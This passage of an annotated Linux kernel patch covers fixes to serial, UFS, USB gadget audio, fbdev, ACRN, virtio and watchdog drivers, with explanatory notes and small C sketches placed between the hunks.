+ static void set_clock_mux(struct uart_port *up, struct brcmuart_priv *priv,
+ 			u32 baud)
+ {
+ 	u32 percent;
+ 	u32 best_percent = UINT_MAX;
+ 	u32 quot;
++	u32 freq;
+ 	u32 best_quot = 1;
+-	u32 rate;
+-	int best_index = -1;
+-	u64 hires_rate;
+-	u64 hires_baud;
+-	u64 hires_err;
++	u32 best_freq = 0;
+ 	int rc;
+ 	int i;
+ 	int real_baud;
+@@ -694,44 +722,35 @@ static void set_clock_mux(struct uart_port *up, struct brcmuart_priv *priv,
+ 	if (priv->baud_mux_clk == NULL)
+ 		return;
+ 
+-	/* Find the closest match for specified baud */
+-	for (i = 0; i < ARRAY_SIZE(priv->real_rates); i++) {
+-		if (priv->real_rates[i] == 0)
+-			continue;
+-		rate = priv->real_rates[i] / 16;
+-		quot = DIV_ROUND_CLOSEST(rate, baud);
+-		if (!quot)
+-			continue;
+-
+-		/* increase resolution to get xx.xx percent */
+-		hires_rate = (u64)rate * 10000;
+-		hires_baud = (u64)baud * 10000;
+-
+-		hires_err = div_u64(hires_rate, (u64)quot);
+-
+-		/* get the delta */
+-		if (hires_err > hires_baud)
+-			hires_err = (hires_err - hires_baud);
+-		else
+-			hires_err = (hires_baud - hires_err);
+-
+-		percent = (unsigned long)DIV_ROUND_CLOSEST_ULL(hires_err, baud);
+-		dev_dbg(up->dev,
+-			"Baud rate: %u, MUX Clk: %u, Error: %u.%u%%\n",
+-			baud, priv->real_rates[i], percent / 100,
+-			percent % 100);
+-		if (percent < best_percent) {
+-			best_percent = percent;
+-			best_index = i;
+-			best_quot = quot;
++	/* Try default_mux_rate first */
++	quot = find_quot(up->dev, priv->default_mux_rate, baud, &percent);
++	if (quot) {
++		best_percent = percent;
++		best_freq = priv->default_mux_rate;
++		best_quot = quot;
++	}
++	/* If more than 1% error, find the closest match for specified baud */
++	if (best_percent > 100) {
++		for (i = 0; i < ARRAY_SIZE(priv->real_rates); i++) {
++			freq = priv->real_rates[i];
++			if (freq == 0 || freq == priv->default_mux_rate)
++				continue;
++			quot = find_quot(up->dev, freq, baud, &percent);
++			if (!quot)
++				continue;
++
++			if (percent < best_percent) {
++				best_percent = percent;
++				best_freq = freq;
++				best_quot = quot;
++			}
+ 		}
+ 	}
+-	if (best_index == -1) {
++	if (!best_freq) {
+ 		dev_err(up->dev, "Error, %d BAUD rate is too fast.\n", baud);
+ 		return;
+ 	}
+-	rate = priv->real_rates[best_index];
+-	rc = clk_set_rate(priv->baud_mux_clk, rate);
++	rc = clk_set_rate(priv->baud_mux_clk, best_freq);
+ 	if (rc)
+ 		dev_err(up->dev, "Error selecting BAUD MUX clock\n");
+ 
+@@ -740,8 +759,8 @@ static void set_clock_mux(struct uart_port *up, struct brcmuart_priv *priv,
+ 		dev_err(up->dev, "Error, baud: %d has %u.%u%% error\n",
+ 			baud, percent / 100, percent % 100);
+ 
+-	real_baud = rate / 16 / best_quot;
+-	dev_dbg(up->dev, "Selecting BAUD MUX rate: %u\n", rate);
++	real_baud = best_freq / 16 / best_quot;
++	dev_dbg(up->dev, "Selecting BAUD MUX rate: %u\n", best_freq);
+ 	dev_dbg(up->dev, "Requested baud: %u, Actual baud: %u\n",
+ 		baud, real_baud);
+ 
+@@ -750,7 +769,7 @@ static void set_clock_mux(struct uart_port *up, struct brcmuart_priv *priv,
+ 	i += (i / 2);
+ 	priv->char_wait = ns_to_ktime(i);
+ 
+-	up->uartclk = rate;
++	up->uartclk = best_freq;
+ }
+ 
+ static void brcmstb_set_termios(struct uart_port *up,
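
The 8250_bcm7271 refactor hoists the divisor and error computation into find_quot() and tries the default mux clock first, scanning the other rates only when the error exceeds 1% (percent is in hundredths of a percent, hence the comparison against 100). The math is quot = round(freq/16 / baud), with the error in hundredths of a percent being |rate/quot - baud| * 10000 / baud. A standalone check of that arithmetic, with an illustrative clock rate:

#include <inttypes.h>
#include <stdio.h>

static uint32_t find_quot(uint32_t freq, uint32_t baud, uint32_t *percent)
{
	uint32_t rate = freq / 16;
	uint32_t quot = (rate + baud / 2) / baud;	/* DIV_ROUND_CLOSEST */
	uint64_t hires_rate, hires_baud, hires_err;

	if (!quot)
		return 0;

	hires_rate = (uint64_t)rate * 10000 / quot;
	hires_baud = (uint64_t)baud * 10000;
	hires_err = hires_rate > hires_baud ? hires_rate - hires_baud
					    : hires_baud - hires_rate;
	/* error in hundredths of a percent (xx.xx%) */
	*percent = (uint32_t)((hires_err + baud / 2) / baud);
	return quot;
}

int main(void)
{
	uint32_t pct, quot = find_quot(81000000, 115200, &pct);

	printf("quot=%" PRIu32 " err=%" PRIu32 ".%02" PRIu32 "%%\n",
	       quot, pct / 100, pct % 100);
	return 0;
}
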
+diff --git a/drivers/tty/serial/8250/8250_mtk.c b/drivers/tty/serial/8250/8250_mtk.c
+index fb1d5ec0940e6..295b9ba1b4f3e 100644
+--- a/drivers/tty/serial/8250/8250_mtk.c
++++ b/drivers/tty/serial/8250/8250_mtk.c
+@@ -209,15 +209,19 @@ static int mtk8250_startup(struct uart_port *port)
+ 
+ static void mtk8250_shutdown(struct uart_port *port)
+ {
+-#ifdef CONFIG_SERIAL_8250_DMA
+ 	struct uart_8250_port *up = up_to_u8250p(port);
+ 	struct mtk8250_data *data = port->private_data;
++	int irq = data->rx_wakeup_irq;
+ 
++#ifdef CONFIG_SERIAL_8250_DMA
+ 	if (up->dma)
+ 		data->rx_status = DMA_RX_SHUTDOWN;
+ #endif
+ 
+-	return serial8250_do_shutdown(port);
++	serial8250_do_shutdown(port);
++
++	if (irq >= 0)
++		serial8250_do_set_mctrl(&up->port, TIOCM_RTS);
+ }
+ 
+ static void mtk8250_disable_intrs(struct uart_8250_port *up, int mask)
+diff --git a/drivers/tty/serial/max3100.c b/drivers/tty/serial/max3100.c
+index c69602f356fdc..5d8660fed081e 100644
+--- a/drivers/tty/serial/max3100.c
++++ b/drivers/tty/serial/max3100.c
+@@ -45,6 +45,9 @@
+ #include <linux/freezer.h>
+ #include <linux/tty.h>
+ #include <linux/tty_flip.h>
++#include <linux/types.h>
++
++#include <asm/unaligned.h>
+ 
+ #include <linux/serial_max3100.h>
+ 
+@@ -191,7 +194,7 @@ static void max3100_timeout(struct timer_list *t)
+ static int max3100_sr(struct max3100_port *s, u16 tx, u16 *rx)
+ {
+ 	struct spi_message message;
+-	u16 etx, erx;
++	__be16 etx, erx;
+ 	int status;
+ 	struct spi_transfer tran = {
+ 		.tx_buf = &etx,
+@@ -213,7 +216,7 @@ static int max3100_sr(struct max3100_port *s, u16 tx, u16 *rx)
+ 	return 0;
+ }
+ 
+-static int max3100_handlerx(struct max3100_port *s, u16 rx)
++static int max3100_handlerx_unlocked(struct max3100_port *s, u16 rx)
+ {
+ 	unsigned int ch, flg, status = 0;
+ 	int ret = 0, cts;
+@@ -253,6 +256,17 @@ static int max3100_handlerx(struct max3100_port *s, u16 rx)
+ 	return ret;
+ }
+ 
++static int max3100_handlerx(struct max3100_port *s, u16 rx)
++{
++	unsigned long flags;
++	int ret;
++
++	uart_port_lock_irqsave(&s->port, &flags);
++	ret = max3100_handlerx_unlocked(s, rx);
++	uart_port_unlock_irqrestore(&s->port, flags);
++	return ret;
++}
++
+ static void max3100_work(struct work_struct *w)
+ {
+ 	struct max3100_port *s = container_of(w, struct max3100_port, work);
+@@ -739,13 +753,14 @@ static int max3100_probe(struct spi_device *spi)
+ 	mutex_lock(&max3100s_lock);
+ 
+ 	if (!uart_driver_registered) {
+-		uart_driver_registered = 1;
+ 		retval = uart_register_driver(&max3100_uart_driver);
+ 		if (retval) {
+ 			printk(KERN_ERR "Couldn't register max3100 uart driver\n");
+ 			mutex_unlock(&max3100s_lock);
+ 			return retval;
+ 		}
++
++		uart_driver_registered = 1;
+ 	}
+ 
+ 	for (i = 0; i < MAX_MAX3100; i++)
+@@ -831,6 +846,7 @@ static void max3100_remove(struct spi_device *spi)
+ 		}
+ 	pr_debug("removing max3100 driver\n");
+ 	uart_unregister_driver(&max3100_uart_driver);
++	uart_driver_registered = 0;
+ 
+ 	mutex_unlock(&max3100s_lock);
+ }
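
Two independent max3100 fixes sit above: the SPI shift words become __be16 because the device expects big-endian frames on the wire (the driver converts with cpu_to_be16()/be16_to_cpu()), and uart_driver_registered is now set only after uart_register_driver() succeeds and cleared again on remove, so a later probe can retry registration. A userspace sketch of the endianness half; the swap below simply assumes a little-endian host, where the kernel helper would be a no-op on big-endian ones:

#include <stdint.h>
#include <stdio.h>

/*
 * Stand-in for the kernel's cpu_to_be16(): this unconditional swap assumes
 * a little-endian host; on big-endian hosts the real helper does nothing.
 */
static uint16_t to_be16(uint16_t v)
{
	return (uint16_t)((v << 8) | (v >> 8));
}

int main(void)
{
	uint16_t tx = 0xC00A;		/* CPU-order command word */
	uint16_t etx = to_be16(tx);	/* the big-endian word on the wire */

	printf("cpu=0x%04X wire=0x%04X\n", (unsigned)tx, (unsigned)etx);
	return 0;
}
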
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index e331b57d6d7d3..e6eedebf67765 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
+@@ -18,6 +18,7 @@
+ #include <linux/module.h>
+ #include <linux/property.h>
+ #include <linux/regmap.h>
++#include <linux/sched.h>
+ #include <linux/serial_core.h>
+ #include <linux/serial.h>
+ #include <linux/tty.h>
+@@ -25,7 +26,6 @@
+ #include <linux/spi/spi.h>
+ #include <linux/uaccess.h>
+ #include <linux/units.h>
+-#include <uapi/linux/sched/types.h>
+ 
+ #define SC16IS7XX_NAME			"sc16is7xx"
+ #define SC16IS7XX_MAX_DEVS		8
+diff --git a/drivers/tty/serial/sh-sci.c b/drivers/tty/serial/sh-sci.c
+index e67d3a886bf4f..08ad5ae411216 100644
+--- a/drivers/tty/serial/sh-sci.c
++++ b/drivers/tty/serial/sh-sci.c
+@@ -1244,9 +1244,14 @@ static void sci_dma_rx_chan_invalidate(struct sci_port *s)
+ static void sci_dma_rx_release(struct sci_port *s)
+ {
+ 	struct dma_chan *chan = s->chan_rx_saved;
++	struct uart_port *port = &s->port;
++	unsigned long flags;
+ 
++	uart_port_lock_irqsave(port, &flags);
+ 	s->chan_rx_saved = NULL;
+ 	sci_dma_rx_chan_invalidate(s);
++	uart_port_unlock_irqrestore(port, flags);
++
+ 	dmaengine_terminate_sync(chan);
+ 	dma_free_coherent(chan->device->dev, s->buf_len_rx * 2, s->rx_buf[0],
+ 			  sg_dma_address(&s->sg_rx[0]));
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index 948449a13247c..5922cb5a1de0d 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -4074,7 +4074,7 @@ static int ufshcd_uic_pwr_ctrl(struct ufs_hba *hba, struct uic_command *cmd)
+ 		 * Make sure UIC command completion interrupt is disabled before
+ 		 * issuing UIC command.
+ 		 */
+-		wmb();
++		ufshcd_readl(hba, REG_INTERRUPT_ENABLE);
+ 		reenable_intr = true;
+ 	}
+ 	spin_unlock_irqrestore(hba->host->host_lock, flags);
+@@ -9817,7 +9817,7 @@ int ufshcd_init(struct ufs_hba *hba, void __iomem *mmio_base, unsigned int irq)
+ 	 * Make sure that UFS interrupts are disabled and any pending interrupt
+ 	 * status is cleared before registering UFS interrupt handler.
+ 	 */
+-	mb();
++	ufshcd_readl(hba, REG_INTERRUPT_ENABLE);
+ 
+ 	/* IRQ registration */
+ 	err = devm_request_irq(dev, irq, ufshcd_intr, IRQF_SHARED, UFSHCD, hba);
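
The UFS hunks in this patch (ufshcd core here, cdns-pltfrm and ufs-qcom below) all replace mb()/wmb() after an MMIO write with a read-back of a register on the same device. A CPU barrier only orders the CPU's own accesses; it cannot flush a write still posted in an interconnect, whereas a read from the same device cannot complete until the earlier write has landed there. Schematically, with kernel MMIO accessors and an illustrative register offset:

#include <linux/io.h>

static void write_and_flush(void __iomem *base, unsigned long reg)
{
	writel(0, base + reg);
	/*
	 * The read-back cannot complete until the write has reached the
	 * device; a bare mb() would only order the CPU's own accesses.
	 */
	(void)readl(base + reg);
}
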
+diff --git a/drivers/ufs/host/cdns-pltfrm.c b/drivers/ufs/host/cdns-pltfrm.c
+index e05c0ae64eea4..38a238eaa2133 100644
+--- a/drivers/ufs/host/cdns-pltfrm.c
++++ b/drivers/ufs/host/cdns-pltfrm.c
+@@ -137,7 +137,7 @@ static int cdns_ufs_set_hclkdiv(struct ufs_hba *hba)
+ 	 * Make sure the register was updated,
+ 	 * UniPro layer will not work with an incorrect value.
+ 	 */
+-	mb();
++	ufshcd_readl(hba, CDNS_UFS_REG_HCLKDIV);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/ufs/host/ufs-qcom.c b/drivers/ufs/host/ufs-qcom.c
+index 8ad1415e10b63..ecd5939f4c9a6 100644
+--- a/drivers/ufs/host/ufs-qcom.c
++++ b/drivers/ufs/host/ufs-qcom.c
+@@ -226,8 +226,9 @@ static void ufs_qcom_select_unipro_mode(struct ufs_qcom_host *host)
+ 	ufshcd_rmwl(host->hba, QUNIPRO_SEL,
+ 		   ufs_qcom_cap_qunipro(host) ? QUNIPRO_SEL : 0,
+ 		   REG_UFS_CFG1);
+-	/* make sure above configuration is applied before we return */
+-	mb();
++
++	if (host->hw_ver.major >= 0x05)
++		ufshcd_rmwl(host->hba, QUNIPRO_G4_SEL, 0, REG_UFS_CFG0);
+ }
+ 
+ /*
+@@ -335,7 +336,7 @@ static void ufs_qcom_enable_hw_clk_gating(struct ufs_hba *hba)
+ 		REG_UFS_CFG2);
+ 
+ 	/* Ensure that HW clock gating is enabled before next operations */
+-	mb();
++	ufshcd_readl(hba, REG_UFS_CFG2);
+ }
+ 
+ static int ufs_qcom_hce_enable_notify(struct ufs_hba *hba,
+@@ -432,7 +433,7 @@ static int ufs_qcom_cfg_timers(struct ufs_hba *hba, u32 gear,
+ 		 * make sure above write gets applied before we return from
+ 		 * this function.
+ 		 */
+-		mb();
++		ufshcd_readl(hba, REG_UFS_SYS1CLK_1US);
+ 	}
+ 
+ 	if (ufs_qcom_cap_qunipro(host))
+@@ -498,9 +499,9 @@ static int ufs_qcom_cfg_timers(struct ufs_hba *hba, u32 gear,
+ 		mb();
+ 	}
+ 
+-	if (update_link_startup_timer) {
++	if (update_link_startup_timer && host->hw_ver.major != 0x5) {
+ 		ufshcd_writel(hba, ((core_clk_rate / MSEC_PER_SEC) * 100),
+-			      REG_UFS_PA_LINK_STARTUP_TIMER);
++			      REG_UFS_CFG0);
+ 		/*
+ 		 * make sure that this configuration is applied before
+ 		 * we return
+diff --git a/drivers/ufs/host/ufs-qcom.h b/drivers/ufs/host/ufs-qcom.h
+index 44466a395bb53..24367cee0b3ff 100644
+--- a/drivers/ufs/host/ufs-qcom.h
++++ b/drivers/ufs/host/ufs-qcom.h
+@@ -36,8 +36,10 @@ enum {
+ 	REG_UFS_TX_SYMBOL_CLK_NS_US         = 0xC4,
+ 	REG_UFS_LOCAL_PORT_ID_REG           = 0xC8,
+ 	REG_UFS_PA_ERR_CODE                 = 0xCC,
+-	REG_UFS_RETRY_TIMER_REG             = 0xD0,
+-	REG_UFS_PA_LINK_STARTUP_TIMER       = 0xD8,
++	/* On older UFS revisions, this register is called "RETRY_TIMER_REG" */
++	REG_UFS_PARAM0                      = 0xD0,
++	/* On older UFS revisions, this register is called "REG_UFS_PA_LINK_STARTUP_TIMER" */
++	REG_UFS_CFG0                        = 0xD8,
+ 	REG_UFS_CFG1                        = 0xDC,
+ 	REG_UFS_CFG2                        = 0xE0,
+ 	REG_UFS_HW_VERSION                  = 0xE4,
+@@ -75,6 +77,9 @@ enum {
+ #define UFS_CNTLR_2_x_x_VEN_REGS_OFFSET(x)	(0x000 + x)
+ #define UFS_CNTLR_3_x_x_VEN_REGS_OFFSET(x)	(0x400 + x)
+ 
++/* bit definitions for REG_UFS_CFG0 register */
++#define QUNIPRO_G4_SEL		BIT(5)
++
+ /* bit definitions for REG_UFS_CFG1 register */
+ #define QUNIPRO_SEL		0x1
+ #define UTP_DBG_RAMS_EN		0x20000
+@@ -146,10 +151,10 @@ static inline void ufs_qcom_assert_reset(struct ufs_hba *hba)
+ 			1 << OFFSET_UFS_PHY_SOFT_RESET, REG_UFS_CFG1);
+ 
+ 	/*
+-	 * Make sure assertion of ufs phy reset is written to
+-	 * register before returning
++	 * Dummy read to ensure the write takes effect before doing any sort
++	 * of delay
+ 	 */
+-	mb();
++	ufshcd_readl(hba, REG_UFS_CFG1);
+ }
+ 
+ static inline void ufs_qcom_deassert_reset(struct ufs_hba *hba)
+@@ -158,10 +163,10 @@ static inline void ufs_qcom_deassert_reset(struct ufs_hba *hba)
+ 			0 << OFFSET_UFS_PHY_SOFT_RESET, REG_UFS_CFG1);
+ 
+ 	/*
+-	 * Make sure de-assertion of ufs phy reset is written to
+-	 * register before returning
++	 * Dummy read to ensure the write takes effect before doing any sort
++	 * of delay
+ 	 */
+-	mb();
++	ufshcd_readl(hba, REG_UFS_CFG1);
+ }
+ 
+ /* Host controller hardware version: major.minor.step */
+diff --git a/drivers/usb/gadget/function/u_audio.c b/drivers/usb/gadget/function/u_audio.c
+index 4a42574b4a7fe..ec1dceb087293 100644
+--- a/drivers/usb/gadget/function/u_audio.c
++++ b/drivers/usb/gadget/function/u_audio.c
+@@ -57,13 +57,13 @@ struct uac_rtd_params {
+ 
+   /* Volume/Mute controls and their state */
+   int fu_id; /* Feature Unit ID */
+-  struct snd_kcontrol *snd_kctl_volume;
+-  struct snd_kcontrol *snd_kctl_mute;
++  struct snd_ctl_elem_id snd_kctl_volume_id;
++  struct snd_ctl_elem_id snd_kctl_mute_id;
+   s16 volume_min, volume_max, volume_res;
+   s16 volume;
+   int mute;
+ 
+-	struct snd_kcontrol *snd_kctl_rate; /* read-only current rate */
++	struct snd_ctl_elem_id snd_kctl_rate_id; /* read-only current rate */
+ 	int srate; /* selected samplerate */
+ 	int active; /* playback/capture running */
+ 
+@@ -494,14 +494,13 @@ static inline void free_ep_fback(struct uac_rtd_params *prm, struct usb_ep *ep)
+ static void set_active(struct uac_rtd_params *prm, bool active)
+ {
+ 	// notifying through the Rate ctrl
+-	struct snd_kcontrol *kctl = prm->snd_kctl_rate;
+ 	unsigned long flags;
+ 
+ 	spin_lock_irqsave(&prm->lock, flags);
+ 	if (prm->active != active) {
+ 		prm->active = active;
+ 		snd_ctl_notify(prm->uac->card, SNDRV_CTL_EVENT_MASK_VALUE,
+-				&kctl->id);
++				&prm->snd_kctl_rate_id);
+ 	}
+ 	spin_unlock_irqrestore(&prm->lock, flags);
+ }
+@@ -807,7 +806,7 @@ int u_audio_set_volume(struct g_audio *audio_dev, int playback, s16 val)
+ 
+ 	if (change)
+ 		snd_ctl_notify(uac->card, SNDRV_CTL_EVENT_MASK_VALUE,
+-				&prm->snd_kctl_volume->id);
++				&prm->snd_kctl_volume_id);
+ 
+ 	return 0;
+ }
+@@ -856,7 +855,7 @@ int u_audio_set_mute(struct g_audio *audio_dev, int playback, int val)
+ 
+ 	if (change)
+ 		snd_ctl_notify(uac->card, SNDRV_CTL_EVENT_MASK_VALUE,
+-			       &prm->snd_kctl_mute->id);
++			       &prm->snd_kctl_mute_id);
+ 
+ 	return 0;
+ }
+@@ -1331,7 +1330,7 @@ int g_audio_setup(struct g_audio *g_audio, const char *pcm_name,
+ 			err = snd_ctl_add(card, kctl);
+ 			if (err < 0)
+ 				goto snd_fail;
+-			prm->snd_kctl_mute = kctl;
++			prm->snd_kctl_mute_id = kctl->id;
+ 			prm->mute = 0;
+ 		}
+ 
+@@ -1359,7 +1358,7 @@ int g_audio_setup(struct g_audio *g_audio, const char *pcm_name,
+ 			err = snd_ctl_add(card, kctl);
+ 			if (err < 0)
+ 				goto snd_fail;
+-			prm->snd_kctl_volume = kctl;
++			prm->snd_kctl_volume_id = kctl->id;
+ 			prm->volume = fu->volume_max;
+ 			prm->volume_max = fu->volume_max;
+ 			prm->volume_min = fu->volume_min;
+@@ -1383,7 +1382,7 @@ int g_audio_setup(struct g_audio *g_audio, const char *pcm_name,
+ 		err = snd_ctl_add(card, kctl);
+ 		if (err < 0)
+ 			goto snd_fail;
+-		prm->snd_kctl_rate = kctl;
++		prm->snd_kctl_rate_id = kctl->id;
+ 	}
+ 
+ 	strscpy(card->driver, card_name, sizeof(card->driver));
+@@ -1420,6 +1419,8 @@ void g_audio_cleanup(struct g_audio *g_audio)
+ 		return;
+ 
+ 	uac = g_audio->uac;
++	g_audio->uac = NULL;
++
+ 	card = uac->card;
+ 	if (card)
+ 		snd_card_free_when_closed(card);
+diff --git a/drivers/video/fbdev/Kconfig b/drivers/video/fbdev/Kconfig
+index ff95f19224901..37089d5a7ccc5 100644
+--- a/drivers/video/fbdev/Kconfig
++++ b/drivers/video/fbdev/Kconfig
+@@ -2014,8 +2014,8 @@ config FB_COBALT
+ 	depends on FB && MIPS_COBALT
+ 
+ config FB_SH7760
+-	bool "SH7760/SH7763/SH7720/SH7721 LCDC support"
+-	depends on FB=y && (CPU_SUBTYPE_SH7760 || CPU_SUBTYPE_SH7763 \
++	tristate "SH7760/SH7763/SH7720/SH7721 LCDC support"
++	depends on FB && (CPU_SUBTYPE_SH7760 || CPU_SUBTYPE_SH7763 \
+ 		|| CPU_SUBTYPE_SH7720 || CPU_SUBTYPE_SH7721)
+ 	select FB_CFB_FILLRECT
+ 	select FB_CFB_COPYAREA
+diff --git a/drivers/video/fbdev/sh_mobile_lcdcfb.c b/drivers/video/fbdev/sh_mobile_lcdcfb.c
+index 6d00893d41f4c..444c3ca9d4d4d 100644
+--- a/drivers/video/fbdev/sh_mobile_lcdcfb.c
++++ b/drivers/video/fbdev/sh_mobile_lcdcfb.c
+@@ -1576,7 +1576,7 @@ sh_mobile_lcdc_overlay_fb_init(struct sh_mobile_lcdc_overlay *ovl)
+ 	 */
+ 	info->fix = sh_mobile_lcdc_overlay_fix;
+ 	snprintf(info->fix.id, sizeof(info->fix.id),
+-		 "SH Mobile LCDC Overlay %u", ovl->index);
++		 "SHMobile ovl %u", ovl->index);
+ 	info->fix.smem_start = ovl->dma_handle;
+ 	info->fix.smem_len = ovl->fb_size;
+ 	info->fix.line_length = ovl->pitch;
+diff --git a/drivers/video/fbdev/sis/init301.c b/drivers/video/fbdev/sis/init301.c
+index a8fb41f1a2580..09329072004f4 100644
+--- a/drivers/video/fbdev/sis/init301.c
++++ b/drivers/video/fbdev/sis/init301.c
+@@ -172,7 +172,7 @@ static const unsigned char SiS_HiTVGroup3_2[] = {
+ };
+ 
+ /* 301C / 302ELV extended Part2 TV registers (4 tap scaler) */
+-
++#ifdef CONFIG_FB_SIS_315
+ static const unsigned char SiS_Part2CLVX_1[] = {
+     0x00,0x00,
+     0x00,0x20,0x00,0x00,0x7F,0x20,0x02,0x7F,0x7D,0x20,0x04,0x7F,0x7D,0x1F,0x06,0x7E,
+@@ -245,7 +245,6 @@ static const unsigned char SiS_Part2CLVX_6[] = {   /* 1080i */
+     0xFF,0xFF,
+ };
+ 
+-#ifdef CONFIG_FB_SIS_315
+ /* 661 et al LCD data structure (2.03.00) */
+ static const unsigned char SiS_LCDStruct661[] = {
+     /* 1024x768 */
+diff --git a/drivers/virt/acrn/mm.c b/drivers/virt/acrn/mm.c
+index b4ad8d452e9a1..8ef49d7be453c 100644
+--- a/drivers/virt/acrn/mm.c
++++ b/drivers/virt/acrn/mm.c
+@@ -155,43 +155,83 @@ int acrn_vm_memseg_unmap(struct acrn_vm *vm, struct acrn_vm_memmap *memmap)
+ int acrn_vm_ram_map(struct acrn_vm *vm, struct acrn_vm_memmap *memmap)
+ {
+ 	struct vm_memory_region_batch *regions_info;
+-	int nr_pages, i = 0, order, nr_regions = 0;
++	int nr_pages, i, order, nr_regions = 0;
+ 	struct vm_memory_mapping *region_mapping;
+ 	struct vm_memory_region_op *vm_region;
+ 	struct page **pages = NULL, *page;
+ 	void *remap_vaddr;
+ 	int ret, pinned;
+ 	u64 user_vm_pa;
+-	unsigned long pfn;
+ 	struct vm_area_struct *vma;
+ 
+ 	if (!vm || !memmap)
+ 		return -EINVAL;
+ 
++	/* Get the page number of the map region */
++	nr_pages = memmap->len >> PAGE_SHIFT;
++	if (!nr_pages)
++		return -EINVAL;
++
+ 	mmap_read_lock(current->mm);
+ 	vma = vma_lookup(current->mm, memmap->vma_base);
+ 	if (vma && ((vma->vm_flags & VM_PFNMAP) != 0)) {
++		unsigned long start_pfn, cur_pfn;
++		spinlock_t *ptl;
++		bool writable;
++		pte_t *ptep;
++
+ 		if ((memmap->vma_base + memmap->len) > vma->vm_end) {
+ 			mmap_read_unlock(current->mm);
+ 			return -EINVAL;
+ 		}
+ 
+-		ret = follow_pfn(vma, memmap->vma_base, &pfn);
++		for (i = 0; i < nr_pages; i++) {
++			ret = follow_pte(vma->vm_mm,
++					 memmap->vma_base + i * PAGE_SIZE,
++					 &ptep, &ptl);
++			if (ret)
++				break;
++
++			cur_pfn = pte_pfn(ptep_get(ptep));
++			if (i == 0)
++				start_pfn = cur_pfn;
++			writable = !!pte_write(ptep_get(ptep));
++			pte_unmap_unlock(ptep, ptl);
++
++			/* Disallow write access if the PTE is not writable. */
++			if (!writable &&
++			    (memmap->attr & ACRN_MEM_ACCESS_WRITE)) {
++				ret = -EFAULT;
++				break;
++			}
++
++			/* Disallow refcounted pages. */
++			if (pfn_valid(cur_pfn) &&
++			    !PageReserved(pfn_to_page(cur_pfn))) {
++				ret = -EFAULT;
++				break;
++			}
++
++			/* Disallow non-contiguous ranges. */
++			if (cur_pfn != start_pfn + i) {
++				ret = -EINVAL;
++				break;
++			}
++		}
+ 		mmap_read_unlock(current->mm);
+-		if (ret < 0) {
++
++		if (ret) {
+ 			dev_dbg(acrn_dev.this_device,
+ 				"Failed to lookup PFN at VMA:%pK.\n", (void *)memmap->vma_base);
+ 			return ret;
+ 		}
+ 
+ 		return acrn_mm_region_add(vm, memmap->user_vm_pa,
+-			 PFN_PHYS(pfn), memmap->len,
++			 PFN_PHYS(start_pfn), memmap->len,
+ 			 ACRN_MEM_TYPE_WB, memmap->attr);
+ 	}
+ 	mmap_read_unlock(current->mm);
+ 
+-	/* Get the page number of the map region */
+-	nr_pages = memmap->len >> PAGE_SHIFT;
+ 	pages = vzalloc(array_size(nr_pages, sizeof(*pages)));
+ 	if (!pages)
+ 		return -ENOMEM;
+@@ -235,12 +275,11 @@ int acrn_vm_ram_map(struct acrn_vm *vm, struct acrn_vm_memmap *memmap)
+ 	mutex_unlock(&vm->regions_mapping_lock);
+ 
+ 	/* Calculate count of vm_memory_region_op */
+-	while (i < nr_pages) {
++	for (i = 0; i < nr_pages; i += 1 << order) {
+ 		page = pages[i];
+ 		VM_BUG_ON_PAGE(PageTail(page), page);
+ 		order = compound_order(page);
+ 		nr_regions++;
+-		i += 1 << order;
+ 	}
+ 
+ 	/* Prepare the vm_memory_region_batch */
+@@ -257,8 +296,7 @@ int acrn_vm_ram_map(struct acrn_vm *vm, struct acrn_vm_memmap *memmap)
+ 	regions_info->regions_num = nr_regions;
+ 	regions_info->regions_gpa = virt_to_phys(vm_region);
+ 	user_vm_pa = memmap->user_vm_pa;
+-	i = 0;
+-	while (i < nr_pages) {
++	for (i = 0; i < nr_pages; i += 1 << order) {
+ 		u32 region_size;
+ 
+ 		page = pages[i];
+@@ -274,7 +312,6 @@ int acrn_vm_ram_map(struct acrn_vm *vm, struct acrn_vm_memmap *memmap)
+ 
+ 		vm_region++;
+ 		user_vm_pa += region_size;
+-		i += 1 << order;
+ 	}
+ 
+ 	/* Inform the ACRN Hypervisor to set up EPT mappings */
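
The acrn_vm_ram_map() change drops follow_pfn() in favour of walking each page of the VM_PFNMAP range with follow_pte() under the PTE lock, rejecting ranges that are discontiguous, not writable when write access is requested, or backed by refcounted pages. The per-page walk reduced to its skeleton; this uses the same kernel-internal calls as the patch and is a sketch, not a drop-in helper:

#include <linux/mm.h>
#include <linux/pgtable.h>

static int walk_pfnmap(struct vm_area_struct *vma, unsigned long base,
		       int nr_pages, unsigned long *first_pfn)
{
	unsigned long pfn;
	spinlock_t *ptl;
	pte_t *ptep;
	int i, ret;

	for (i = 0; i < nr_pages; i++) {
		ret = follow_pte(vma->vm_mm, base + i * PAGE_SIZE, &ptep, &ptl);
		if (ret)
			return ret;
		pfn = pte_pfn(ptep_get(ptep));
		pte_unmap_unlock(ptep, ptl);	/* drop the PTE lock promptly */

		if (i == 0)
			*first_pfn = pfn;
		else if (pfn != *first_pfn + i)
			return -EINVAL;		/* range must be contiguous */
	}
	return 0;
}
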
+diff --git a/drivers/virtio/virtio_pci_common.c b/drivers/virtio/virtio_pci_common.c
+index a6c86f916dbdf..6bfb67d4866c3 100644
+--- a/drivers/virtio/virtio_pci_common.c
++++ b/drivers/virtio/virtio_pci_common.c
+@@ -345,8 +345,10 @@ static int vp_find_vqs_msix(struct virtio_device *vdev, unsigned int nvqs,
+ 				  vring_interrupt, 0,
+ 				  vp_dev->msix_names[msix_vec],
+ 				  vqs[i]);
+-		if (err)
++		if (err) {
++			vp_del_vq(vqs[i]);
+ 			goto error_find;
++		}
+ 	}
+ 	return 0;
+ 
+diff --git a/drivers/watchdog/bd9576_wdt.c b/drivers/watchdog/bd9576_wdt.c
+index 4a20e07fbb699..f00ea1b4e40b6 100644
+--- a/drivers/watchdog/bd9576_wdt.c
++++ b/drivers/watchdog/bd9576_wdt.c
+@@ -29,7 +29,6 @@ struct bd9576_wdt_priv {
+ 	struct gpio_desc	*gpiod_en;
+ 	struct device		*dev;
+ 	struct regmap		*regmap;
+-	bool			always_running;
+ 	struct watchdog_device	wdd;
+ };
+ 
